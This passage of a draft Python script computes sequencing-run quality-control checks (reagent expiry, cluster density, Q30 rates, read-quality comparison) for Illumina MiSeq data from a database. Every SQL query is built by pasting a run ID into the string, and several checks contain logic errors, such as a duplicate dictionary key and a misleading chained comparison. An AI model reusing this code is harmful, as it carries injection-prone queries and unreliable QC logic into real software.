run\n continue\n\n sql_command = \"\"\" SELECT MAX(CorrectedIntMetrics.CycleID)\n FROM CorrectedIntMetrics\n WHERE CorrectedIntMetrics.MiSeqRunID = \"\"\" + \"'\" + run_for_import + \"'\"\n cursor.execute(sql_command)\n current_run_called = cursor.fetchall()[0][0]\n #print(\"Called\")\n #print(current_run_called)\n\n sql_command = \"\"\" SELECT MAX(QualityMetrics.CycleID)\n FROM QualityMetrics\n WHERE QualityMetrics.MiSeqRunID = \"\"\" + \"'\" + run_for_import + \"'\"\n cursor.execute(sql_command)\n current_run_scored = cursor.fetchall()[0][0]\n #print(\"Scored\")\n #print(current_run_scored)\n\n #Tests to ensure that the wrong bit will trigger- do one at a time\n #current_run_extracted = 2 #Pass test\n #current_run_called = 2 #Pass test\n #current_run_scored = 2 #Pass test\n\n ##Is the run complete\n ##Check that the total number of extracted matches the number of cycles from the reads- if not then there's a problem\n #Remove this for now so that code continues to execute\n ###assert current_run_extracted == num_cycles_reads\n ##Are the extracted, called and scored numbers equal? i.e. is run analysis complete\n if current_run_extracted != current_run_called == current_run_scored:\n #warnings.warn(\"Run \" + str(run_for_import) + \" incomplete\")\n print(\"Run analysis \" + str(run_for_import) + \" incomplete\")\n \n ##Are all the reagents in date from the run date?\n #Extract run date\n cursor.execute(\"\"\" SELECT MiSeqRun.RunStartDate\n FROM MiSeqRun\n WHERE MiSeqRun.MiSeqRunID = \"\"\" + \"'\" + run_for_import + \"'\")\n run_date = cursor.fetchall()[0][0]\n #print(run_date)\n \n ##Extract reagent dates\n cursor.execute(\"\"\" SELECT MiSeqRun.FlowCellExpiry, MiSeqRun.PR2BottleExpiry, MiSeqRun.ReagentKitExpiry \n FROM MiSeqRun\n WHERE MiSeqRun.MiSeqRunID = \"\"\" + \"'\" + run_for_import + \"'\")\n reagent_dates = cursor.fetchall()[0]\n #print(reagent_dates)\n for reagent_date in reagent_dates:\n #print(reagent_date)\n if (reagent_date < run_date):\n #warnings.warn(\"One of the run reagents or the flow cell was out of date\")\n print(\"One of the run reagents or the flow cell was out of date\")\n \n ##Extract version number of reagents\n cursor.execute(\"\"\" SELECT MiSeqRun.KitVersionNumber\n FROM MiSeqRun\n WHERE MiSeqRun.MiSeqRunID = \"\"\" + \"'\" + run_for_import + \"'\")\n kit_version = cursor.fetchall()[0][0]\n kt = str(kit_version)\n\n #Create a dictionary with threshold values for number of reads passing filter\n #Source: http://www.illumina.com/systems/miseq/performance_specifications.html\n threshold_reads = {(\"2\",\"SE\"):(12000000,15000000),(\"2\",\"PE\"):(24000000,30000000),(\"2\",\"SE\"):(22000000,25000000),(\"3\",\"PE\"):(44000000,50000000)}\n #print(threshold_reads)\n\n #Pull number of reads for entire run\n cursor.execute(\"\"\" SELECT SUM(Value) AS ReadsPerRun\n FROM TileMetrics\n WHERE TileMetrics.MiSeqRunID = \"\"\" + \"'\" + run_for_import + \"'\" \"\"\"\n AND TileMetrics.CodeID = '102'\n GROUP BY TileMetrics.MiSeqRunID \"\"\")\n #reads_per_run = cursor.fetchall()\n reads_per_run = cursor.fetchall()[0][0]\n #print(reads_per_run)\n reads_per_run = (int(reads_per_run))\n\n #Pull number of reads passing filter\n cursor.execute(\"\"\" SELECT SUM(Value) AS ReadsPerRunPF\n FROM TileMetrics\n WHERE TileMetrics.MiSeqRunID = \"\"\" + \"'\" + run_for_import + \"'\" \"\"\"\n AND TileMetrics.CodeID = '103'\n GROUP BY TileMetrics.MiSeqRunID \"\"\")\n reads_per_run_pf = cursor.fetchall()[0][0]\n reads_per_run_pf = (int(reads_per_run_pf))\n #print(reads_per_run_pf)\n\n #Work out proportion of runs \n proportion_reads_per_run_pf = (float(reads_per_run_pf))/(float(reads_per_run))\n #print(proportion_reads_per_run_pf)\n perc_reads_per_run_pf = (100*proportion_reads_per_run_pf)\n read_perc_threshold = 80 #Set the low threshold for reads passing filter\n\n #print(reads_per_run_pf)\n #print(reads_per_run)\n #print(perc_reads_per_run_pf)\n #Trigger warning if a low proportion/percentage of reads pass filter\n if perc_reads_per_run_pf < read_perc_threshold:\n #warnings.warn(\"Fewer than 80% of reads passing filter\")\n print(\"Fewer than 80% of reads passing filter\")\n \n #Retrieve the values associated with the kit version\n #All runs are with paired end reads!!! ASSUME PAIRED END FOR NOW\n #print(kit_version)\n threshold_reads_vals = threshold_reads.get((str(kit_version),\"PE\"))\n \n if threshold_reads_vals == None:\n #warnings.warn(\"No threshold read number available for kit version \" + kt)\n print(\"No threshold read number available for kit version \" + kt)\n #print(threshold_reads_vals)\n\n '''\n #Testing\n #reads_per_run_pf = 50\n reads_per_run_pf = 25000000\n #reads_per_run_pf = 50000000\n '''\n else:\n #if (reads_per_run_pf < threshold_reads_vals[0]) | (reads_per_run_pf > threshold_reads_vals[1]):\n #warnings.warn(\"Read count outside Illumina recommended range. Paired end sequencing assumed\")\n #print(\"Read count outside Illumina recommended range. Paired end sequencing assumed.\")\n if (reads_per_run_pf < threshold_reads_vals[0]):\n print(\"Read count lower than Illumina recommended range at \" + str(\"%.0f\" %reads_per_run_pf) + \" on a v\" + kt + \" kit. Paired end sequencing assumed.\")\n elif(reads_per_run_pf > threshold_reads_vals[1]):\n print(\"Read count higher than Illumina recommended range at \" + str(\"%.0f\" %reads_per_run_pf) + \"on a v\" + kt + \" kit. Paired end sequencing assumed.\")\n\n #Create a dictionary with threshold cluster densities for reagent version numbers\n #Values outside of these should generate a warning\n #Source https://my.illumina.com/MyIllumina/Bulletin/AH1453j-w0KpvCnZRqLYlA/cluster-density-specifications-for-illumina-sequen\n threshold_dens = {\"2\":(1000,1200),\"3\":(1200,1400)}\n #Set an outside value exceeding which generates an error\n outside_threshold_dens = {\"2\":(850,1250),\"3\":(1100,1500)}\n \n ##Cluster density\n cursor.execute(\"\"\" SELECT TileMetrics.TileID, TileMetrics.Value/1000 AS ClusterDensity\n FROM TileMetrics\n WHERE TileMetrics.CodeID = '100'\n AND TileMetrics.MiSeqRunID = \"\"\" + \"'\" + run_for_import + \"'\")\n cluster_density_full = cursor.fetchall()\n cluster_density_full_arr = np.array(cluster_density_full)\n #print(\"Cluster Density Data Full Extracted\")\n mean_dens = (np.mean(cluster_density_full_arr[:,1]))\n max_dens = (np.max(cluster_density_full_arr[:,1]))\n min_dens = (np.min(cluster_density_full_arr[:,1]))\n std_dens = (np.std(cluster_density_full_arr[:,1])) # This default does across axis=0 which is correct\n median_dens = (np.median(cluster_density_full_arr[:,1]))\n #print(std_dens)\n\n #print out the cluster density\n #print(str(mean_dens) + \" +/- \" + str(std_dens))\n\n ##Cluster density passing filter\n cursor.execute(\"\"\" SELECT TileMetrics.TileID, TileMetrics.Value/1000 AS ClusterDensity\n FROM TileMetrics\n WHERE TileMetrics.CodeID = '101'\n AND TileMetrics.MiSeqRunID = \"\"\" + \"'\" + run_for_import + \"'\")\n cluster_density_full_pf = cursor.fetchall()\n cluster_density_full_pf_arr = np.array(cluster_density_full_pf)\n #print(\"Cluster Density Data Full Passing Filter Extracted\")\n mean_dens_pf = (np.mean(cluster_density_full_pf_arr[:,1]))\n std_dens_pf = (np.std(cluster_density_full_pf_arr[:,1]))\n median_dens_pf = (np.median(cluster_density_full_pf_arr[:,1]))\n\n #Retrieve the values associated with the kit version\n threshold_vals_dens = threshold_dens.get(str(kit_version),None)\n outside_threshold_vals_dens = outside_threshold_dens.get(str(kit_version),None)\n \n #threshold_vals_dens = 10000 #Test triggering of below if clause with the 'or'\n \n if threshold_vals_dens == None or outside_threshold_vals_dens == None:\n #warnings.warn(\"No threshold cluster density available for kit version \" + kt)\n print(\"No threshold cluster density available for kit version \" + kt)\n #print(threshold_vals_dens)\n #print(outside_threshold_vals_dens)\n '''\n #Testing values\n #mean_dens_pf = 750\n #mean_dens_pf = 650\n #mean_dens_pf = 1000\n #mean_dens_pf = 1200\n '''\n else:\n cluster_d = str(\"%.2f\" %mean_dens_pf)\n #Checks for thresholding levels on cluster density\n if (mean_dens_pf < outside_threshold_vals_dens[0]):\n #raise Exception(\"Cluster density very low at \"+ cluster_d + \" on a v\" + kt + \" kit\")\n #Removed exception so that code doesn't stop executing when multiple runs go in\n #warnings.warn(\"Cluster density very low at \"+ cluster_d + \" on a v\" + kt + \" kit\")\n print(\"Cluster density passing filter very low at \"+ cluster_d + \" on a v\" + kt + \" kit\")\n elif (mean_dens_pf > outside_threshold_vals_dens[1]):\n #raise Exception(\"Cluster density very high at \"+ cluster_d + \" on a v\" + kt + \" kit\")\n #Removed exception so that code doesn't stop executing when multiple runs go in\n #warnings.warn(\"Cluster density very high at \"+ cluster_d + \" on a v\" + kt + \" kit\")\n print(\"Cluster density passing filter very high at \"+ cluster_d + \" on a v\" + kt + \" kit\")\n elif (mean_dens_pf < threshold_vals_dens[0]):\n #outside Illumina recommended thresholds\n #warnings.warn(\"Cluster density is low at \" + cluster_d + \" on a v\" + kt + \" kit\")\n print(\"Cluster density passing filter is low at \" + cluster_d + \" on a v\" + kt + \" kit\")\n elif (mean_dens_pf > threshold_vals_dens[1]):\n #outside Illumina recommended thresholds\n #warnings.warn(\"Cluster density is high at \" + cluster_d + \" on a v\" + kt + \" kit\")\n print(\"Cluster density passing filter is high at \" + cluster_d + \" on a v\" + kt + \" kit\")\n\n #Is there a big range in the cluster density?- this is over tiles and could indicate a problem with a tile\n #To use std dev or iqr? Start with std dev\n #Threshold for standard deviation\n #print((std_dens/mean_dens)*100) # This is the % of the mean that falls within 1 standard deviation\n #What is a high amount of % of the mean to fall outside of 1sd?\n #Set std threshold to that\n std_threshold = float(mean_dens)*0.05 #Pick the correct threshold value (gone for 5% of the mean here)- There was not really any need to do this as COV is already normalised\n threshold_COV_cluster_density = 0.05 # (5%)\n #print(mean_dens)\n #print(float(mean_dens))\n #print((std_dens/mean_dens))\n #print(float(mean_dens)*0.018159995802775248)\n #print(float(mean_dens)*0.05)\n #print(std_dens)\n\n #This is all great but why not have a go at the coefficient of variation, which is the standardised measure of dispersion\n COV_cluster_density = std_dens/mean_dens # Proportion of the mean that falls within 1 standard deviation\n #print(COV_cluster_density)\n #print(((std_dens/mean_dens)*100))\n #print(std_threshold)\n '''\n if ((std_dens/mean_dens)*100) > std_threshold: \n print(\"Large range in cluster densities. Possible issue with a tile.\")\n '''\n if COV_cluster_density > threshold_COV_cluster_density:\n #warnings.warn(\"Large range in cluster densities. Possible issue with a tile.\")\n print(\"Large range in cluster densities. Possible issue with a tile.\")\n\n #Is there a big gap between cluster density and cluster density passing filter?\n #If they are doing boxplots then it should be based on the median\n perc_diff_med_cd = (median_dens_pf/median_dens*100)\n #Working out a useful threshold- where would median be if was at a value of 'x'- here 85\n #print((float(85)/float(100))*float(median_dens))\n \n threshold_med_cd = 85 #Is this a useful threshold?\n \n if perc_diff_med_cd < threshold_med_cd:\n #warnings.warn(\"Low number of clusters passing filter\") \n print(\"Low number of clusters passing filter. Only \" + str(\"%.2f\" %perc_diff_med_cd) + \"% passing filter.\") \n \n #Large range in cluster densities over different cycles\n #I DO NOT HAVE ACCESS TO THIS DATA- Only have tilewise information and nothing regarding cycle\n\n '''\n ##Number/Proportion of bases >Q30\n cursor.execute(\"\"\" SELECT (SUM(Q30)+SUM(Q31)+SUM(Q32)+SUM(Q33)+SUM(Q34)+SUM(Q35)\n +SUM(Q36)+SUM(Q37)+SUM(Q38)+SUM(Q39)+SUM(Q40)+SUM(Q41)+SUM(Q42)+SUM(Q43)\n +SUM(Q44)+SUM(Q45)+SUM(Q46)+SUM(Q47)+SUM(Q48)+SUM(Q49)+SUM(Q50)) /\n (SUM(Q01)+SUM(Q02)+SUM(Q03)+SUM(Q04)+SUM(Q05)+SUM(Q06)+SUM(Q07)+SUM(Q08)+\n SUM(Q09)+SUM(Q10)+SUM(Q11)+SUM(Q12)+SUM(Q13)+SUM(Q14)+SUM(Q15)+SUM(Q16)+\n SUM(Q17)+SUM(Q18)+SUM(Q19)+SUM(Q20)+SUM(Q21)+SUM(Q22)+SUM(Q23)+SUM(Q24)+\n SUM(Q25)+SUM(Q26)+SUM(Q27)+SUM(Q28)+SUM(Q29)+SUM(Q30)+SUM(Q31)+SUM(Q32)+\n SUM(Q33)+SUM(Q34)+SUM(Q35)+SUM(Q36)+SUM(Q37)+SUM(Q38)+SUM(Q39)+SUM(Q40)+\n SUM(Q41)+SUM(Q42)+SUM(Q43)+SUM(Q44)+SUM(Q45)+SUM(Q46)+SUM(Q47)+SUM(Q48)+\n SUM(Q49)+SUM(Q50))\n FROM QualityMetrics\n WHERE QualityMetrics.MiSeqRunID = \"\"\" + \"'\" + run_for_import + \"'\")\n qual_metrics_Q30 = cursor.fetchall()\n qual_over_Q30 = qual_metrics_Q30[0][0]\n print(qual_over_Q30)\n '''\n '''\n #Testing\n qual_over_Q30 = 0.88\n qual_over_Q30 = 0.78\n '''\n '''\n if qual_over_Q30 < 0.85:\n raise Exception(\"Only \" + str(\"%.0f\" %(qual_over_Q30*100)) + \"% of bases over Q30\")\n elif qual_over_Q30 < 0.90:\n warnings.warn(\"Fewer than 90% of bases are over Q30\")\n '''\n #This could be a plot of number of reads valued at each quality bin\n #Currently would require a separate data extract as the variable stores only the total proportion\n #See below where have all the quality metrics\n \n #Look at reads separately\n cursor.execute(\"\"\" SELECT *\n FROM QualityMetrics\n WHERE QualityMetrics.MiSeqRunID = \"\"\" + \"'\" + run_for_import + \"'\")\n qual_metrics = cursor.fetchall()\n qual_metrics_arr = np.asarray(qual_metrics)\n #Number of columns in the quality metrics array\n qual_num_cols = (len(qual_metrics_arr[0,:]))\n #Number of rows in the quality metrics array\n qual_num_rows = (len(qual_metrics_arr[:,0]))\n #Create array excluding the MiSeqRunID (which cannot be force converted to an integer)\n qual_metrics_arr_mod = np.concatenate((qual_metrics_arr[:,0:3],qual_metrics_arr[:,4:qual_num_cols]),axis=1)\n #Force conversion of array to integer type (necessary as db driver retrieves strings)\n qual_metrics_arr_mod_int = qual_metrics_arr_mod.astype(np.int64) #Need a longint here or get a buffer overflow later\n #print(qual_metrics_arr_mod_int)\n\n #Need to sort the data based on cycle if going to slice it later (3rd column)\n qual_metrics_arr_mod_int_sorted = qual_metrics_arr_mod_int[qual_metrics_arr_mod_int[:,2].argsort()]\n #print(qual_metrics_arr_mod_int_sorted)\n\n # Remove the three entries that aren't actual quality bins\n qual_metrics_arr_mod_int_sorted_subs = (qual_metrics_arr_mod_int_sorted[:,3:qual_num_cols])\n #print(qual_metrics_arr_mod_int_sorted_subs)\n #print(sum(qual_metrics_arr_mod_int_sorted_subs))\n #print(np.cumsum(sum(qual_metrics_arr_mod_int_sorted_subs)))\n\n #Work out the Q30 proportion over the entire array\n Q30_qual_arr = qual_metrics_arr_mod_int_sorted_subs[:,29:len(qual_metrics_arr_mod_int_sorted_subs[0,:])] # 29 is the position of Q30\n Q30_number = (np.sum(Q30_qual_arr))\n #print(Q30_number) #This is correct- checked against Excel spreadsheet\n Qtotal_number = (np.sum(qual_metrics_arr_mod_int_sorted_subs))\n #print(Qtotal_number) #This is correct- checked against Excel spreadsheet\n prop_Q30_qual = (float(Q30_number)/float(Qtotal_number))\n\n #print(prop_Q30_qual)\n #prop_Q30_qual = 0.755475737227 #Testing\n \n #Get the recommended Q30 thresholds and test if run meets the criteria\n #Source: http://www.illumina.com/systems/miseq/performance_specifications.html\n #For Q30 averaged across entire run\n #Logic is a bit awkward, but it works- revisit later to tidy up\n illumina_Q30_threshold_bins = {\"2\":(25,150,250),\"3\":(75,300)}\n illumina_Q30_threshold_bins_for_kit = illumina_Q30_threshold_bins.get(str(kit_version),None)\n \n #print(illumina_Q30_threshold_bins_for_kit)\n #print(type(read1_length))\n \n #read1_length = 156 #This is a test\n #read1_length = 300\n #read1_length = 10\n #read1_length = 150\n #read1_length = 149 \n try:\n cycle_kit = -1\n for threshold in illumina_Q30_threshold_bins_for_kit:\n if (read1_length == threshold) | ((read1_length-1) == threshold):\n #print(\"go\") #check for triggering\n cycle_kit = threshold\n\n if (cycle_kit == -1):\n ind_of_next_higher = bisect.bisect(illumina_Q30_threshold_bins_for_kit, read1_length)\n if ind_of_next_higher > (len(illumina_Q30_threshold_bins_for_kit)-1): #handle case where number is higher than last one in tuple. -1 as python 0 indexed.\n cycle_kit = illumina_Q30_threshold_bins_for_kit[(ind_of_next_higher-1)]\n else:\n cycle_kit = illumina_Q30_threshold_bins_for_kit[ind_of_next_higher]\n illumina_Q30_thresholds = {(\"2\",\"25\"):(0.90),(\"2\",\"150\"):(0.80),(\"2\",\"250\"):(0.75),(\"3\",\"75\"):(0.85),(\"3\",\"300\"):(0.70)}\n Q30_illumina_threshold = illumina_Q30_thresholds.get((str(kit_version),str(cycle_kit)),None)\n \n #Now handle the cases where there's no kit\n except TypeError:\n print(\"No Q30 threshold available for kit version \" + str(kt) + \". Q30 threshold set to 85%\") # Set a fallback value for if threshold value not in dictionary\n Q30_illumina_threshold = 0.85\n \n if prop_Q30_qual < Q30_illumina_threshold:\n #warnings.warn(\"Fewer than 90% of bases are over Q30\")\n print(\"Number of bases over Q30 failed to meet Illumina recommended thresholds\")\n print(\"Only \" + str(\"%.0f\" %(prop_Q30_qual*100)) + \"% of bases over Q30\")\n\n #print(Q30_qual_arr)\n #print(qual_metrics_arr_mod_int_sorted_subs)\n\n ##To split into separate reads based on number of cycles\n ##There is a cycle per each tile, which includes top and bottom surface (so 2*number of tiles)\n ##Obtain the number of tiles\n cursor.execute(\"\"\" SELECT MiSeqRun.NumTiles\n FROM MiSeqRun\n WHERE MiSeqRunID = \"\"\" + \"'\" + run_for_import + \"'\")\n num_tls = cursor.fetchall()[0][0]\n \n #Obtain the number of surfaces\n cursor.execute(\"\"\" SELECT MiSeqRun.NumSurfaces\n FROM MiSeqRun\n WHERE MiSeqRunID = \"\"\" + \"'\" + run_for_import + \"'\")\n num_surfaces = cursor.fetchall()[0][0]\n #print(num_surfaces) \n #print(num_tls)\n #print(read1_length)\n #print(read2_length)\n\n #This sums up all the values column-wise- could use to replace separate data extract above\n #print(np.sum(qual_subs_arr_int, axis = 0))\n\n #This sums up all the values row-wise- the different summed totals probably reflect the different reads\n #This is of limited use if it is not sorted\n #print(np.sum(qual_subs_arr_int, axis = 1))\n\n '''\n Testing sorting\n a = np.array([[1,2,3],[1,4,5],[1,1,6]])\n ab = a[a[:,1].argsort()]\n print(a)\n print(ab)\n '''\n\n #How the reads (without the index reads) extend\n r1_end = num_surfaces*num_tls*read1_length\n #read1\n first_read_qual = qual_metrics_arr_mod_int_sorted[0:r1_end,:]\n #read2\n r2_start = r1_end + (ind_reads*num_surfaces*num_tls)\n #print(ind_reads)\n second_read_qual = qual_metrics_arr_mod_int_sorted[r2_start:qual_num_rows,:]\n #print(second_read_qual)\n\n #Subset of array containing bins Q01-Q50 only- start from position 3 as started from the int array so\n #MiSeqRunID has already been removed- this slicing has been tested to slice at the correct position\n first_read_qual_subs =(first_read_qual[:,3:qual_num_cols])\n second_read_qual_subs =(second_read_qual[:,3:qual_num_cols])\n\n #print(np.sum(first_read_qual_subs,axis=0))\n '''\n #Check index of Q30 (checked against Excel spreadsheet)- it is at index 32 in the full array\n print(first_read_qual)\n print(first_read_qual[:,1:3]) #Get the tile and cycle number for comparison with the entry below\n print(first_read_qual[:,32]) #Will be -3 in the substring- this is checked too- need full index to get correct entry in Excel sheet\n #Check values match- they do\n print(first_read_qual_subs[:,29])\n '''\n\n #Find the proportion of Q30 for the first read\n Q30_r1_arr = first_read_qual_subs[:,29:len(first_read_qual_subs[0,:])]\n Q30_r1 = (np.sum(Q30_r1_arr))\n #print(Q30_r1) #This is correct checked against Excel spreadsheet\n Qtotal_r1 = (np.sum(first_read_qual_subs))\n #print(Qtotal_r1) #This is correct checked against Excel spreadsheet\n prop_Q30_r1 = (float(Q30_r1)/float(Qtotal_r1))\n #print(prop_Q30_r1*100)\n\n #Find the proportion of Q30 for the second read\n if r2_start < (len(qual_metrics_arr_mod_int_sorted)):\n #Handle the case where there is no second read\n Q30_r2_arr = second_read_qual_subs[:,29:len(second_read_qual_subs[0,:])]\n Q30_r2 = (np.sum(Q30_r2_arr))\n #print(Q30_r1) #This is correct checked against Excel spreadsheet\n Qtotal_r2 = (np.sum(second_read_qual_subs))\n #print(Qtotal_r1) #This is correct checked against Excel spreadsheet\n prop_Q30_r2 = (float(Q30_r2)/float(Qtotal_r2))\n #print(prop_Q30_r2*100)\n\n #Is there a big difference in >Q30 between r1 and r2?- Test for significance- this is later, first test spread of quality scores\n #Just look to see if there is a difference in the spread of quality scores perhaps\n #For this will need to create a 1D distribution across the range of quality scores\n #We already have this with the first/second_read_qual_subs- just need to sum it over the correct axis\n r1_qual_distn = np.sum(first_read_qual_subs,axis=0)\n r2_qual_distn = np.sum(second_read_qual_subs,axis=0)\n\n #Non-parametric, so use rank sum test (Wilcoxon?)\n #Need to figure out a useful test for this kind of frequency data\n '''\n Use Mann Whitney for independent samples? Alternative is Kolmogorov-Smirnov.\n Mann Whitney test deals better with ties (values that are the same and need to be converted into rank)\n We have got a fair bit of tied data (all 0 values and huge numbers of values in same Q bin), so I prefer Mann-Whitney to K-S.\n K-S is more sensitive to changes in shape of distribution etc though.\n Have tried Chi-Sq and Fisher's exact test, but they can't be used because there's more than 2x2 (Fisher) and\n The ChiSq test cannot be used because of the 0s in the 'expected' frequencies as well\n '''\n '''\n #First unpack the data to its non-binned form\n qual_range = np.arange(1,51) #Known a priori that the range of quality values is Q1 to Q50\n '''\n #Unpack the data to its non-binned form\n qual_range = np.arange(1,51) #Known a priori that the range of quality values is Q1 to Q50\n \n #print(np.cumsum(r1_qual_distn)) # Check numbers match with the length of the unpacked array\n #r1_qual_raw = np.repeat(qual_range,r1_qual_distn)# This takes too much memory\n #r2_qual_raw = np.repeat(qual_range,r2_qual_distn)# This takes too much memory\n \n #K-S downsampling to try to avoid out of memory error\n r1_qual_distn_downsample = (np.divide(r1_qual_distn,1000))\n r2_qual_distn_downsample = (np.divide(r2_qual_distn,1000))\n \n '''\n pl.plot(r1_qual_distn_downsample)\n pl.plot(r2_qual_distn_downsample)\n pl.show()\n '''\n \n #'''THE QUAL RAW DONWSAMPLE DEFINITELY WANTS A 'DISCRETE' TEST OF SOME SORT\n r1_qual_raw_downsample = np.repeat(qual_range,(r1_qual_distn_downsample/1000)) # Not being used atm- have temp /1000 again 23/02\n r2_qual_raw_downsample = np.repeat(qual_range,(r2_qual_distn_downsample/1000)) # Not being used atm- have temp /1000 again 23/02\n \n k_s_statistic, k_s_pvalue = stat.ks_2samp(r1_qual_raw_downsample,r2_qual_raw_downsample)\n print(k_s_pvalue)\n #'''\n \n '''\n pl.plot(r1_qual_raw_downsample)\n pl.plot(r2_qual_raw_downsample)\n pl.show()\n '''\n \n '''\n m_w_statistic, m_w_pvalue = stat.mannwhitneyu(r1_qual_raw_downsample,r2_qual_raw_downsample)\n print(m_w_pvalue)\n '''\n \n '''\n print(r1_qual_raw_downsample)\n print(r2_qual_raw_downsample)\n #print(np.cumsum(r1_qual_distn))\n #print(np.sum(r1_qual_raw_downsample))\n '''\n #Create bins of quality data\n '''\n print(r1_qual_distn)\n print(r1_qual_distn[0:25])\n print(r1_qual_distn[25:49])\n print(np.sum(r1_qual_distn[0:25]))\n print(np.sum(r1_qual_distn[25:49]))\n print(np.sum(r1_qual_distn))\n '''\n '''\n r1_qual_bin_1 = np.sum(r1_qual_distn[0:25])\n r1_qual_bin_2 = np.sum(r1_qual_distn[25:49])\n r2_qual_bin_1 = np.sum(r2_qual_distn[0:25])\n r2_qual_bin_2 = np.sum(r2_qual_distn[25:49])\n \n r1_qual_chi = np.asarray((r1_qual_bin_1,r1_qual_bin_2))\n r2_qual_chi = np.asarray((r2_qual_bin_1,r2_qual_bin_2))\n \n print(r1_qual_chi)\n print(r2_qual_chi)\n \n chi, chi_p_value = stat.chisquare(r2_qual_chi,f_exp=r1_qual_chi)\n g, g_p_value = stat.power_divergence(r2_qual_chi,r1_qual_chi)\n \n print(chi_p_value)\n print(chi)\n \n print(g_p_value)\n '''\n '''\n #Can't put count data into this- need to change it if use\n k_s_statistic, k_s_pvalue = stat.ks_2samp(r1_qual_distn,r2_qual_distn) # Can't do this as only for continuous email\n '''\n #Downsampled data to avoid out of memory error\n #k_s_statistic, k_s_pvalue = stat.ks_2samp(r1_qual_raw_downsample,r2_qual_raw_downsample)\n #k_s_statistic, k_s_pvalue = stat.ks_2samp(r1_qual_raw_downsample,r2_qual_raw_downsample)\n #m_w_statistic, m_w_pvalue = stat.mannwhitneyu(r1_qual_raw_downsample,r2_qual_raw_downsample) #Never going to work because of bug\n #t_statistic, t_pvalue = stat.ttest_ind(r1_qual_raw_downsample,r2_qual_raw_downsample)\n #t_statistic, t_pvalue = stat.ttest_ind(r1_qual_raw_downsample,r1_qual_raw_downsample)\n \n k_s_statistic, k_s_pvalue = stat.ks_2samp(r1_qual_distn_downsample,r2_qual_distn_downsample)\n \n #print(r1_qual_distn)\n #print(r1_qual_distn.transpose())\n #chi2, chi_pvalue = stat.chisquare(r1_qual_distn,r2_qual_distn) #No\n #fish, fish_pvalue =\n #gtest, gtest_pvalue = (r1_qual_distn,r2_qual_distn,lambda_=\"log-likelihood\") \n #print(gtest_pvalue) \n #print(fish_pvalue)\n #print(np.mean(r1_qual_raw))\n #print(np.mean(r2_qual_raw))\n #print(m_w_pvalue)\n #print(m_w_statistic)\n #print(k_s_pvalue)\n #print(t_pvalue)\n \n #Bug in the Mann_Whitney p value calculation in scipy, so the p_value statistic is reported as nan\n ''' \n pl.figure(1)\n pl.plot(r1_qual_distn)\n pl.show()\n '''\n \n #print(k_s_pvalue)\n #print(np.isnan(t_pvalue))\n #print(t_pvalue)\n #print(k_s_pvalue)\n \n if (k_s_pvalue < 0.05): # 95% confidence, was at 0.05\n '''\n This may not be the right test, but I couldn't find anything better for now (tried ChiSq and Fishers\n but can't use them as there's more than 2x2 categories\n Also I don't think the data are binned- it is frequencies for each Q score...\n '''\n #warnings.warn(\"Big difference in median quality between read1 and read2\") # Was a median, but mann whitney tie correction broken in scipy\n print(\"Big difference in quality between read 1 and read 2\")\n elif np.isnan(k_s_pvalue):\n print(\"One of the reads has a problem. Could not compare\")\n \n '''\n pl.figure(1)\n pl.plot(r1_qual_distn)\n pl.figure(2)\n pl.plot(r2_qual_distn)\n #pl.figure(3)\n #pl.plot(r1_qual_raw)\n #pl.figure(4)\n #pl.plot(r2_qual_raw)\n pl.figure(5)\n pl.plot(r1_qual_raw_downsample)\n pl.figure(6)\n pl.plot(r2_qual_raw_downsample)\n pl.show()\n '''\n \n ##Abnormal patterns in data by cycle plot (% bases >Q30)\n #Generate a data by cycle plot\n\n #Locate the data which contains the quality information only\n #first_read_qual_subs\n #second_read_qual_subs\n ''' This was a check for the data match- it matches ok\n cursor.execute(\"\"\" SELECT QualByRow.MiSeqRunID,QualByRow.CycleID,\n OverQ30 AS OverQ30\n FROM QualByRow \n WHERE QualByRow.CycleID = QualByRow.CycleID\n AND QualByRow.MiSeqRunID = \"\"\" + \"'\" + run_for_import + \"'\" \"\"\"\n GROUP BY QualByRow.MiSeqRunID, QualByRow.CycleID, QualByRow.TileID \"\"\")\n quality_over_cycle_all = cursor.fetchall()\n quality_over_cycle_all_arr = np.asarray(quality_over_cycle_all)\n #print(quality_over_cycle_all_arr) #Try to match this data without the need for the extract\n\n\n x = quality_over_cycle_all_arr[:,1]\n y = quality_over_cycle_all_arr[:,2]\n\n pl.figure(10)\n f1 = pl.plot(x,y)\n '''\n\n #Find the data for the first read\n #print(first_read_qual_subs)\n #read1_length\n #Try to replicate the above plot without the data extract- need proportion of cycle over Q30\n #Do an array division number Q30 over total number for each cycle\n\n #Sum each row to get Q30 values\n #Read 1\n #Need to convert arrays to float arrays or the resultant division will be nearest int (so all 0s)\n Q30_by_row_r1 = np.ndarray.astype(np.sum(Q30_r1_arr,axis=1),float)\n #print(Q30_by_row_r1)\n #print(len(Q30_by_row_r1))\n #Sum each row to get total values\n #Need to convert arrays to float arrays or the resultant division will be nearest int (so all 0s)\n total_by_row_r1 = np.ndarray.astype(np.sum(first_read_qual_subs,axis=1),float)\n proportion_Q30_r1 = np.divide(Q30_by_row_r1,total_by_row_r1)\n proportion_Q30_r1 = np.nan_to_num(proportion_Q30_r1)\n\n #print(proportion_Q30_r1[::14])\n\n #print(np.sum(proportion_Q30_r1))\n\n #pl.plot(proportion_Q30_r1)\n #pl.show()\n\n #Pull out the medians- remember this array is already sorted by cycle\n #First chunk the array into slices based on cycle:- start:stop:step\n #Test the slicing on the full array that has the cycles included- easier validation that it is working properly\n #print(first_read_qual[:(num_tls*num_surfaces):,:]) # This is correct- checked against excel spreadsheet\n #print(first_read_qual[:(num_tls*num_surfaces)+1,:]) # Testing that the above does stop where cycle switches from 1 to 2\n\n #Therefore here we have the part without the identifiers for the first read below\n #print(first_read_qual_subs[:(num_tls*num_surfaces):,:])\n #First thing to do is get the numbers for each quality bin over cycle\n #sum this array subset column-wise- this is the number of falling into each quality category, from Q01 to Q50\n ''' This was for the first cycle, but need to calculate this for all of the cycles- so within the loop\n cycle_qual_binned_vals = np.sum(first_read_qual_subs[:(num_tls*num_surfaces):,:],axis = 0)\n print(cycle_qual_binned_vals)\n '''\n #Test iterating through the cycles in chunks, cause that is what will need to do\n #and then nest the other things within in \n\n '''\n lst = []\n print(first_read_qual[:,2])\n lst.append(first_read_qual[:,2][::(num_tls*num_surfaces)]) # This is correct, but I want the index of this value, not the value\n #lst.append(first_read_qual_subs[::(num_tls*num_surfaces),:]) #Test with the one with the cycle info included\n print(lst)\n '''\n\n '''\n for iq,xq in enumerate(first_read_qual[:,2]):\n print(first_read_qual[:,2]) # This is the whole row in which the cycle is stored\n print (first_read_qual[:,2][iq:])\n '''\n ''' \n for start in lst:\n 